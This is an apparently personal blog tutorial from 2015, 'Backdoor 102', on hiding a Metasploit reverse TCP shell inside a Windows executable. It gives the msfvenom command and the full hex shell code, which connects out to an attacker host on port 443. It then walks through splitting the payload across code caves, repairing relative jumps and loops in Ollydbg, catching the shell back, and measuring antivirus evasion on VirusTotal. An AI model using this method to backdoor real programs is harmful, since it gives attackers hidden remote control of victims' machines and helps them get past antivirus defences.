Backdoor 102
Note: this post was written in September 2015
Introduction
This episode of Backdoor looks at analysing shell code to find points where it can be split cleanly into several smaller pieces. Splitting at those points means each piece needs only minimal adjustment to keep the whole working. We will not be trying to increase the evasion rate of the back door here; that will be discussed in a later episode.
Shell code generated by msfvenom uses relative short jumps, so careless splitting can cause the code to crash. To overcome this, we will take the generated shell code and analyse its branches to understand how it operates.
This tutorial will cover shell code splitting and how to test to ensure that the shell code’s original functionality has not been modified.
A quick preview of what to expect before reading the rest of the post is described by the diagram below.
Setting up the environment
If we refer to Backdoor 101, we will recall the environment set up section of the tutorial. This is intended to be similar so if you already know how to set it up, you can skip ahead to the following section.
In our test environment, we have two virtual machines set up. The first runs Kali Linux 2.0 (Sana) and the second runs Windows 7. For virtual machine setup instructions, please refer to a dedicated guide [1]. Both machines are configured to use Network Address Translation (NAT) rather than bridged mode. We chose NAT for compatibility, as VMware often does not allow bridging onto wireless networks.
Once the two machines are booted, we first need to check the IP addresses allocated. On the Linux machine we can run the ifconfig command and on the Windows machine we can run ipconfig.
The following image shows ifconfig being run on the Kali Linux machine, revealing the IP address allocated to it by DHCP. An observant reader may notice that the IP address of my attacking machine has changed since the last tutorial; that is fine.
On the Windows machine, the ipconfig command should be used, as shown in the following screenshot.
The network set up can therefore be visualised by the following diagram. The machine running our virtual machines is the host, which is likely to be behind a firewall. Your host will have its own internal IP address, which has been left out to simplify the diagram. The host uses VMware to create its own virtual network in the 192.168.1.0/24 range, which gives us the usable IP addresses from 192.168.1.1 to 192.168.1.254. The range can be configured to restrict the number of possible IP addresses if required; this will not be covered in this tutorial.
It is trivial in VMware to create multiple instances through duplication, and doing so is recommended for further testing. Shell code that works on 32 bit systems may not work on 64 bit systems, so testing is required. In my tutorials, I will mainly focus on 32 bit executables. Later, I will write a tutorial for readers who are interested in 64 bit PE infection.
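As a quick check of the address range described above, Python's standard ipaddress module can list the usable hosts in a /24. This is only a sketch: the 192.168.1.0/24 network is the one from this lab, and yours may well differ.

```python
import ipaddress

# The lab network used in this tutorial (an assumption; substitute your own).
network = ipaddress.ip_network("192.168.1.0/24")

# hosts() leaves out the network address (.0) and the broadcast address (.255).
hosts = list(network.hosts())
first_host, last_host = hosts[0], hosts[-1]

print(first_host, last_host, len(hosts))
```

Narrowing the prefix (for example to /28) is one way to restrict the number of possible addresses.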
Basic shell code analysis
Splitting the shell code is a lot easier if we first analyse the sections it contains. By pasting the shell code into The Online Disassembler [2] (ODA), we can visualise the code using a graph view. We are using ODA rather than IDA Pro or similar tools so that readers do not need to download anything or run into licensing issues. ODA gives us a quick and easy way to obtain the information we need, and its graph visualisation helps us understand the flow of execution in the shell code.
The first step is to generate the shell code for the reverse TCP stager with the following command. LHOST must be set to the address of the attacker machine that the shell code will connect back to. LPORT is set to 443 because firewalls commonly allow egress on that port.
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.133 LPORT=443 -f hex
At this point, you may notice that one byte of the shell code differs from the previous tutorial: the last octet of the IP address is now 0x85 (133) instead of the 0x82 (130) used last time.
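To see where that byte comes from, the sketch below converts the LHOST and LPORT values into the network-order bytes that show up in the hex output. The helper name host_and_port_bytes is made up for this illustration.

```python
import ipaddress
import struct

def host_and_port_bytes(lhost, lport):
    """Return the IPv4 address and the port as network-order hex strings."""
    ip_hex = ipaddress.IPv4Address(lhost).packed.hex()
    port_hex = struct.pack(">H", lport).hex()  # big-endian 16-bit port
    return ip_hex, port_hex

ip_hex, port_hex = host_and_port_bytes("192.168.1.133", 443)
previous_ip_hex, _ = host_and_port_bytes("192.168.1.130", 443)

print(ip_hex, port_hex, previous_ip_hex)
```

Only the last byte of the address differs between the two runs, which is the single-byte change mentioned above.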
To analyse the given shell code, take the shell code and paste it into The Online Disassembler. Other tools such as IDA Pro may be used but in this instance we will focus on using this web based tool. The following image displays the box that the shell code should be placed into and the assembly parsed and displayed by the tool.
Clicking on the “graph” button displays the following graph. The graph shows that the shell code is really made up of chunks. “While” loops are one type of loop often used in programming, and they translate into assembly as conditional jump operations. Jumps redirect execution flow to different sections of code in order to allow branching. The graph view splits the code at these jumps and lets us visualise the resulting sections. It is theoretically possible to split a shell code of n instructions into n code caves. This may be extreme, but it can put off many more antivirus (AV) scans because they depend on signatures. A later tutorial will give analysts some insight into generating signatures for tools such as YARA [3], the pattern matching Swiss knife for malware researchers.
By this point, I hope that we can appreciate the basic operations and understand how the shell code divides into sections by its logical nature. When we split the code, it is important that the jumps within each code cave still reach the correct instructions in their respective caves. The jump operations used here encode a relative number of bytes to move forwards or backwards; they do not take the absolute address or location of the shell code into account. The shell code that msfvenom generates uses relative jumps throughout. Therefore, if we move a section of code which contains a jump, the hardcoded relative offset will no longer lead to the correct destination. msfvenom was not created with shell code splitting in mind. It merely generates shell code which will run on a target operating system and perform a task within a minimal defined space.
To understand how the jumps are used in assembly, the remainder of this section is aimed at understanding the code flow. If you are already familiar with code flow tracing, you can skip to the next section.
The following screenshot takes the beginning of the shell code visualisation up to a jump and its destination.
If we take notice of the top section of code, there is a blue arrow coming out of it but no other arrow. This indicates that the disassembler is accommodating for a jump back from a future section of code (indicated by the green arrow on the far right coming into the top section).
Moving on to the second chunk of code, we can see a red arrow leading to a single instruction, followed by another arrow leading into a larger section. To the right of these two smaller arrows there is a larger green arrow which points to the same destination. Both flows reach the same point in the code, but which one is taken depends on a condition. At the end of the chunk we can see a **JL** operation code (op-code), which means “jump if less”, a branching condition.
We will choose to split this section of the code. The red line across the following image displays the separation line. If the line crosses two jumps, it indicates that there are three initial branches we need to fix after splitting.
As we have previously learned, we need to pay extra attention to the “jump if less than” branch displayed below.
Recalling the extra jump back to the first section of code on the further right hand side, we can scroll down to see where that jump is. The highlighted green arrow below displays this happening and where the root of the jump is. This concludes the section. Keeping the points that we have analysed and found in mind, we can continue onto splitting the shell code.
Splitting the code
To split the code into separate code caves, we need to know how much space each cave requires. Code caves are explained in the first episode of the series, and this tutorial will not go over how to search for them again. To find out how many bytes the instructions translate to, and to allow extra bytes for contingency, switch back to the disassembly view in ODA. We can split the shell code into the two consecutive sections displayed below.
After splitting the above shell code, we are left with the following two streams of bytes.
fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20 c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd56a0568c0a8018568020001bb89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8610000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d225868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c24e971ffffff01c329c675c7c3bbf0b5a2566a0053ffd5
To know how many bytes we need for each code cave, we can take the length of its hex string and divide it by 2 (2 hex digits per byte). This gives lengths of 37 and 296 bytes, as shown below.
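The same calculation can be done in a couple of lines of Python. This is a minimal sketch using the first of the two byte streams above; the function name byte_length and the CONTINGENCY constant are illustrative, with the 10 spare bytes being the margin used in this tutorial.

```python
# First of the two byte streams from the split, copied from above.
first_piece = (
    "fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20"
)

CONTINGENCY = 10  # spare bytes added on top of each cave in this tutorial

def byte_length(hex_string):
    """Number of bytes encoded by a hex string (two hex digits per byte)."""
    return len(bytes.fromhex(hex_string))

first_length = byte_length(first_piece)
first_cave_size = first_length + CONTINGENCY

print(first_length, first_cave_size)
```

Using bytes.fromhex rather than plain division has the side benefit of raising an error if a digit was lost while copying the hex.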
However, if we recall from the first tutorial, we must perform the following:
Store the registers
Store the flags
Shell code
Align stack
Restore flags
Restore registers
Fix execution flow and follow it
Therefore, we need extra bytes. I would just add 10 bytes on top of each code cave size for contingency. Therefore we have two caves of sizes 47 and 306 respectively.
Labelling in Ollydbg
Labelling in Ollydbg gives us an easy way to reference addresses. We can name address points and then assemble against those names. You will see why we are doing this when the labels are used in the next section; trust me for now that it is not a time waster. Please do not use the exact same code cave addresses as me. Code cave one actually corrupts the original data and the program crashes. It is important that you find two safe code caves to use, and it may take some time and experimentation before you find two that work. The code caves below were not my final cave addresses.
Take the first code cave and give it the label **cc1**. The following image displays this.
Do the same with the second code cave using **cc2**, as displayed in the following image.
Now that we have both of the code caves labelled, we can begin placing the code into the appropriate places and fixing the references between them, which ends this section.
Injecting into OnExit
Following on from the previous tutorial, we can locate an appropriate location on the exit procedural flow. This will not be covered in this guide and it will be assumed that you have found an appropriate injection point and understood how to align and fix the procedural flow.
Label the point of injection as orig as displayed in the following screenshot. Label the return point as returnpoint.
Let us jump to the first section of the code cave. Press space, or right click the point of injection and click assemble.
If the previous sections were completed and labelled correctly, the following displayed assembly will work.
Pressing assemble will then produce the result shown below.
If we press enter with the line of code selected, we can follow the code into our code cave. Another way to do this is right click -> follow. After doing so, you will be directed to a view similar to the one below.
Filling in code cave one
As we mentioned previously, we have the two snippets of split code now.
We can paste the first of the two shell code snippets into the first smaller code cave of at least 47 bytes. Before we do this, we need to save the registers and flags.
Assemble the following code into the code cave as displayed below.
After performing this step, we can begin assembling our first part of the shell code. Firstly, copy the shell code into your clipboard as hex. Secondly, highlight a large number of lines then right click -> binary -> binary paste. The following screenshot visualises this process.
In a normal scenario, the code after **sub al, 20** would flow directly into the next instruction, which is now located in code cave two. However, the two pieces are no longer one contiguous section of code, so execution needs manual assistance to reach the next code cave. We resolve this with a jump operation. Assemble a jump to the next code cave as displayed below.
We can confirm that this is directed correctly by pressing enter. This will then put us in code cave two range.
Filling in code cave two
We do not need to save the registers and flags in this case because we have already done so previously in the beginning of the previous code cave. Now following the previous method, highlight multiple lines and paste in the shell code. Make sure that enough lines are highlighted as it will only overwrite those that are selected and will not insert.
The following screenshot displays the beginning of the shell code injected.
At the end of the shell code, we need to align the stack, restore the flags and registers, then restore the damaged original instructions and jump back. The screenshot below demonstrates these fixes.
Following the final jump, we should return to the original point. It is important to test that these vital jumps redirect the code to the correct locations. We must save the code before continuing with the correction of all the other location relative jumps and calls within the code, so that we are executing the correct code at all times.
In this tutorial, I reverted to Ollydbg 1.1.0 and I can use right click -> copy -> select all displayed below.
Followed by a right click -> copy to executable.
You may be required to save each code section change one at a time. Therefore, you can save a few different executables. Ollydbg does not allow you to copy all changes in the entire executable.
After saving the binary, restart the executable and ensure that all the breakpoints are in place. We will break on the orig point and step through the code to identify jump and call operations that are using relative locations to addresses as operands. Operands are the parameters used with an operation code.
At this point, a run of the executable crashes. This is not normal. After further testing, we realise that the location used for code cave one was not safe.
Therefore, we need to go through the original process again and find a safe location for code cave one. I will not go over this again as the process is the same, and it is summarised by the following flow diagram. This is the same diagram as at the beginning of the post, re-used to help with the explanation.
Fixing relative location operands
In this section of the tutorial, I will be demonstrating the fixing of relative locations. I will go through the explanation of how to fix operations which use relative addressing through a detailed process. The tutorial will also include a section on how to step through the shell code to ensure that all the operations that use operands which contain relative locations are referring to the correct locations.
To be able to fix this, we need to understand how the location of the instruction to be called is calculated. Looking at the call, we can see the bytes E8 82000000. The byte **E8** is the operation code for a call to a relative location. The bytes 82000000 are in little endian and resolve to 0x82, which is 130 in decimal. Therefore, the instruction that will get called is 130 bytes after the address of the next instruction. The calculation performed is 0x0047B4B2 + 0x82 = 0x0047B534, so we can conclude that this is correct. However, now that the second part of the shell code has been moved into another region, the 0x82 offset no longer applies. We need to find the offset that calls the same instruction as before the split.
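The arithmetic behind a relative call can be sketched in Python. The function name call_target is illustrative; the address 0x0047B4B2 is taken from the text as the address of the instruction following the call, and the operand is the four bytes after E8.

```python
def call_target(next_instruction_address, operand):
    """Resolve an E8 call: target = address of next instruction + signed rel32."""
    displacement = int.from_bytes(operand, byteorder="little", signed=True)
    return (next_instruction_address + displacement) & 0xFFFFFFFF

operand = bytes.fromhex("82000000")  # little endian, resolves to 0x82

# Using the address seen in the debugger.
target = call_target(0x0047B4B2, operand)

# The same sum on offsets within the shell code: the call occupies
# offsets 0x1 to 0x5, so the next instruction sits at offset 0x6.
target_offset = call_target(0x6, operand)

print(hex(target), hex(target_offset))
```

The displacement is read as a signed value because calls and jumps can also point backwards, in which case the operand bytes look like a very large number.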
Referring back to ODA, we can see what instruction actually exists at the current offset of +0x82. The following image shows the call and by clicking on the address, it will redirect us.
The subsequent illustration shows the landing point after clicking on the address. From seeing the highlighted instruction, we can see that the computer is being instructed to perform a pop ebp next.
The next step is to locate the same instruction in the second code cave. Time for a handy trick! First, we can see that pop ebp is located at an offset of 0x88 from the start of the code. The first instruction of code cave two, ror edi, 0xD, is located at offset 0x25, so we can find the difference: 0x88 - 0x25 = 0x63. Double clicking at the start of code cave two in Ollydbg sets its offset to 0x00 and creates a relative location counter for us. This is displayed below.
Now by scrolling down to a displacement of $+0x63, we find pop ebp located at the global offset of 0x0047B85F. This address will differ depending on where your second code cave is located. The following screenshot should provide better understanding.
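The offset bookkeeping can be written down as a small helper. This is a sketch under assumptions: the function name locate is made up, and the two start addresses are inferred from figures quoted in the text (0x0047B4B2 - 0x6 for where the shell code bytes begin in cave one, 0x0047B85F - 0x63 for cave two) purely for illustration. Your addresses will differ.

```python
SPLIT_OFFSET = 0x25  # offset of ror edi, 0xD, the first instruction of piece two

# Illustrative addresses inferred from the text, not values to reuse.
CAVE_ONE_CODE_START = 0x0047B4AC
CAVE_TWO_CODE_START = 0x0047B7FC

def locate(original_offset):
    """Map an offset in the unsplit shell code to (cave label, address)."""
    if original_offset < SPLIT_OFFSET:
        return "cc1", CAVE_ONE_CODE_START + original_offset
    return "cc2", CAVE_TWO_CODE_START + (original_offset - SPLIT_OFFSET)

cave, address = locate(0x88)  # pop ebp
print(cave, hex(address))
```

Any other offset read from ODA can be passed through the same helper to find which cave it ended up in.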
Now that we are at the correct location, we can set a label for easier recognition. For example, I will set the label to be call1loc. This is shown below.
We now have the location that the call would have reached if we had not split the shell code. To fix the incorrect relative location, we return to the call in code cave one and assemble it as call call1loc. Ollydbg will automatically look up the address we gave the label call1loc and work out the offset required to call it. The next section will continue the process of discovering and patching operations with relative addressing.
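Ollydbg does this calculation for us, but it helps to see what it works out. The sketch below rebuilds the five bytes of a relative call from the address of the call and the address of its target. The function name encode_call is illustrative, and the addresses combine figures quoted earlier (a call whose next instruction is at 0x0047B4B2, and pop ebp at 0x0047B85F) as an example only, since the caves in the screenshots were not the final ones.

```python
def encode_call(call_address, target_address):
    """Assemble `call target` as E8 followed by a little-endian rel32."""
    next_instruction = call_address + 5  # E8 plus a four byte operand
    displacement = (target_address - next_instruction) & 0xFFFFFFFF
    return b"\xe8" + displacement.to_bytes(4, "little")

CALL_ADDRESS = 0x0047B4B2 - 5  # illustrative: the call ends where 0x0047B4B2 begins

original = encode_call(CALL_ADDRESS, 0x0047B534)  # target before the split
patched = encode_call(CALL_ADDRESS, 0x0047B85F)   # target now in code cave two

print(original.hex(), patched.hex())
```

The opcode stays the same; only the four operand bytes change when the target moves.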
Discovering the rest
Before we start this section, a quick tip for checking where jumps or calls go to is to use the enter key or right click -> follow. This was previously mentioned. However, there is also the minus key or right click -> go to -> previous which will take you back to where you were before pressing enter. This is useful as we can trace code through every relative operation with ease by going back and forth.
Now that we have fixed all of the relative operations in code cave one, we need to fix all of those in code cave two. To do so, we go through every operation in code cave two that uses a relative location as its operand. For each one, we need to confirm that the relative location is one of the following:
In code cave one
In code cave two
A jump back to the original return point
In code cave two, we can see that the loop command also uses relative addressing. This one loops back to offset 0x1e, which holds a **lods al, byte ptr ds: [esi]** operation. The following screenshot shows this happening.
To resolve this, we need to target the **lods al, byte ptr ds: [esi]** instruction in code cave one. Set the label looploc on the lods instruction. In this case, we cannot simply assemble the loop against the label and have to work around it ourselves, because the loop operand is a single signed byte and can only reach from -128 to +127 bytes from the next instruction. The following screenshot displays the error shown when an attempt to loop to looploc is made.
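The one byte limit is easy to check by hand. The sketch below decodes the loop bytes e2 f2 found at offset 0x2a of the unsplit shell code, then tests whether a cross-cave distance would still fit. The function names are made up, and the two cave addresses are the illustrative ones inferred from earlier figures, not values to reuse.

```python
def rel8_target(instruction_offset, instruction_bytes):
    """Target of a two byte short branch: next instruction + signed rel8."""
    displacement = int.from_bytes(instruction_bytes[1:2], "little", signed=True)
    return instruction_offset + 2 + displacement

def fits_rel8(displacement):
    """A short branch operand is one signed byte."""
    return -128 <= displacement <= 127

# In the unsplit shell code: loop (e2 f2) at offset 0x2a goes back to 0x1e.
loop_target = rel8_target(0x2A, bytes.fromhex("e2f2"))

# After the split (illustrative addresses): the loop's next instruction is
# in code cave two, while the lods it wants to reach is in code cave one.
next_after_loop = 0x0047B803
lods_address = 0x0047B4CA
cross_cave_displacement = lods_address - next_after_loop

print(hex(loop_target), cross_cave_displacement, fits_rel8(cross_cave_displacement))
```

A distance of several hundred bytes cannot be expressed in the loop operand, which is why the assembler rejects it.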
During this tutorial, I could not find a loop operation code that takes an operand of more than one byte. Therefore, I will make use of another small code cave to replicate what a loop would do. The loopd operator performs the following, as described in the image.
As we can see, the operator decrements the **ECX** register and then jumps if the count is not equal to zero. We can replicate this by first jumping to a code cave as shown in the following screenshot. Ensure that the third code cave is labelled as cc3 and the instruction following the jump is labelled as cc3ret. It is also important that we take note of the commands replaced and damaged by the no operation (nop) commands.
Following into code cave three, we need to construct the following process to replicate the effect performed by loop:
Decrease counter (ECX) by one
Compare counter to zero
If the counter is not equal to zero, the zero flag is not set -> jump to the original loop destination
Fix the original overwritten operations
Jump back to the original execution path in the shell code
However, the decrement and compare modify the zero flag (ZF), which the original loop leaves untouched. We therefore push the flags onto the stack first and pop them back off on whichever branch we take, before committing to the rest of the execution. This is demonstrated by the following construction.
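The reasoning can be checked with a toy model in Python. This is not the assembly from the screenshot, only a sketch of the behaviour it is meant to preserve: both functions are hypothetical models that track just ECX and the zero flag.

```python
MASK32 = 0xFFFFFFFF

def native_loop(ecx, zf):
    """Model of x86 loop: decrement ECX, branch if non-zero, flags untouched."""
    ecx = (ecx - 1) & MASK32
    return ecx, zf, ecx != 0

def emulated_loop(ecx, zf):
    """Model of the replacement: save flags, decrement, test, branch, restore."""
    saved_zf = zf             # pushfd
    ecx = (ecx - 1) & MASK32  # dec ecx
    zf = (ecx == 0)           # cmp ecx, 0 sets ZF when the counter reaches zero
    taken = not zf            # jnz: branch while ZF is clear
    zf = saved_zf             # popfd, on whichever path is followed
    return ecx, zf, taken

# Compare both models over a few counter values and both flag states.
results_match = all(
    native_loop(ecx, zf) == emulated_loop(ecx, zf)
    for ecx in (0, 1, 2, 5)
    for zf in (True, False)
)
print(results_match)
```

Dropping the save and restore from the second model makes the comparison fail whenever the incoming ZF disagrees with the counter, which is the situation the pushed flags guard against.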
After fixing this, the code runs fine once again. The next jump that we run into is the one located before call1loc that we allocated earlier. This is highlighted in the image below.
Now we need to find out where the **jump** goes to. By using ODA once again we can see that the jump is going back to code cave one at offset 0x15. The following screenshots display this.
If we now go into Ollydbg and set a label on the endpoint, we can fix the jump as we did earlier on. I have labelled this as omgret. The following screenshots display the labelling as well as the jump fix. However, in this case, the jump fix breaks the code, therefore we will jump into a code cave then fix the execution and jump back in. Since the code already jumps to an empty section, we will make use of it and just jump directly to the omgret.
After exploring and tracing the shell code more thoroughly, it appears that we have finished fixing it! Ensure that everything is saved and ready to be run for the testing phase.
Testing the back door
From the last tutorial, we already know the process of setting up the handler. Therefore, this episode will not explain these steps. The following screenshot shows the handler being set up.
To continue with the test, we must upload the executable that now has a back door into the victim virtual machine. After doing so, we must execute the payload and press the “X” button to exit and see if we actually get a shell back. With a little bit of luck and lots of skill, we can now go to sleep after seeing the following message.
Results and conclusion
In this section, I will analyse the evasion rate of this new payload. At the beginning of the tutorial, I stated that this is not aimed at increasing the evasion rate. The purpose of this tutorial is to enjoy and learn the process of splitting shell code into multiple caves whilst keeping the execution cycle intact.
As I am not fussed about giving my techniques away to VirusTotal, we can observe some results below. Interestingly, the evasion rate has now increased to ~93%. I have also realised that the previous rate was actually 89%, as I had miscalculated in **Backdoor 101**. This time, we have killed off **two** more antiviruses, Avast and ClamAV. This should not be down to the shell code splitting itself. The most likely reason is that the code modified in order to split the shell code has changed the signature, so Avast’s and ClamAV’s signature databases do not contain our newly changed signatures. In a future tutorial, I will be covering how to create signatures of shell code for tools such as YARA. After we understand how signatures are created, we can begin to think of methods to bypass signature checking and achieve greater evasion ratios.
Once again, thank you for reading my blog post. I highly value any feedback, recommendations and advice for writing, documentation and research progression as I am still a newbie in the information security industry.
References
[2] https://www.onlinedisassembler.com/
[3] http://plusvic.github.io/yara/